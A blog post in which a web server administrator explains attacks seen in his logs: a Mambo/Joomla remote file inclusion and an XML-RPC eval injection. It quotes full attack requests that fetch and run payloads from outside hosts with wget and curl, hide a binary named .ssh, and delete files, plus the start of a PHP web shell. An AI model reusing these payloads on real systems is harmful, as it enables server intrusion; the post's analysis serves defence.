typo3bloke.net

Usually I analyze security logs for my web server daily. And each day I see various haching attempts. While I do not understand what causes people doing it (this is not a political site!), I am very interested to see how they do it.

One or two weeks ago one more vulnerability in Mambo/Joomla was found. Typical attack looks like this:

GET /gallery/components/com_cpg/cpg.php? mosConfig_absolute_path=http://200.72.130.29/cmd.gif? &cmd=cd%20/tmp/;wget%20http://61.19.55.250/icons/mambo1.txt; perl%20mambo1.txt;rm%20-rf%20mambo1.*? HTTP/1.0
Host: www.*****.lv
Accept: */*
User-Agent: Mozilla/5.0

Quite obvious: hacker rely on allow_url_fopen to be enabled. PHP will use include() function to include the files from hacker's site using http protocol just like a local site. The file on a server is PHP script, which will be executed (or at least hacker expects so) in the context of attacked server (mine). This kind of attack is old as age and any experienced administrator disable allow_url_fopen in php.ini these days. Additionally, my server does not have mambo, joomla, wget or curl installed. So this particular attack came to the wrong address.

If you still cannot understand how it works, look how beginning of http://200.72.130.29/cmd.gif looks like:

<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
-->
<?php

//The Rules
include("http://ess.trix.net/therules.dat");

if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];

if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));


//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){

Today a fresh attack came into. Here is what I got today:

POST /xmlsrv/xmlrpc.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.*****.lv
User-Agent: Internet Explorer 6.0
Content-Length: 501

<?xml
version="1.0"?><methodCall><methodName>foo.bar</methodName><params> <param><value><string>1</string></value></param><param><value> <string>1</string></value></param><param><value> <string>1</string></value></param><param><value> <string>1</string></value></param><param><value><name>',''));
system('unset HISTFILE;cd /tmp ; mkdir .... ; cd .... ; wget stadco.com/images/site/.ssh ; curl -O stadco.com/images/site/.ssh ; chmod 777 .ssh ; ./.ssh'); die; /*</name></value></param></params></methodCall>

Notice how cleaver it looks.

First part (non-bold) is obviously XMLRPC request. First six bold chars looks like a closing for function. So hacker found that some (unknown to me) XMLRPC code) uses PHP function eval() this way:

eval('my_another_function("$xmlrpcCall")');

Why do I think so? Look how PHP parser will treat this whole code. my_another_function() will definitely fail because XMLRPC request is invalid (it is terminated in the middle by function closing construct - those six chars). But eval() then will execute the rest: system() call that fetches .ssh file with .ssh settings to the current directory. File with this name is used by ssh for configuration, so inexperienced administrator may skip it while searching for hacking scripts. The rest of the string makes sure that PHP does not fail by commenting everything after this point. If wget or curl succeed, loaded .ssh file is made executable and executed. This file is not a script, it is Linux executable (ELF).

So this attack is simple and effective. I sometimes become shocked how creative and clever hackers can be.

Looks like this attack is really new because I could not find it on secunia.com - my favorite site for security announcements.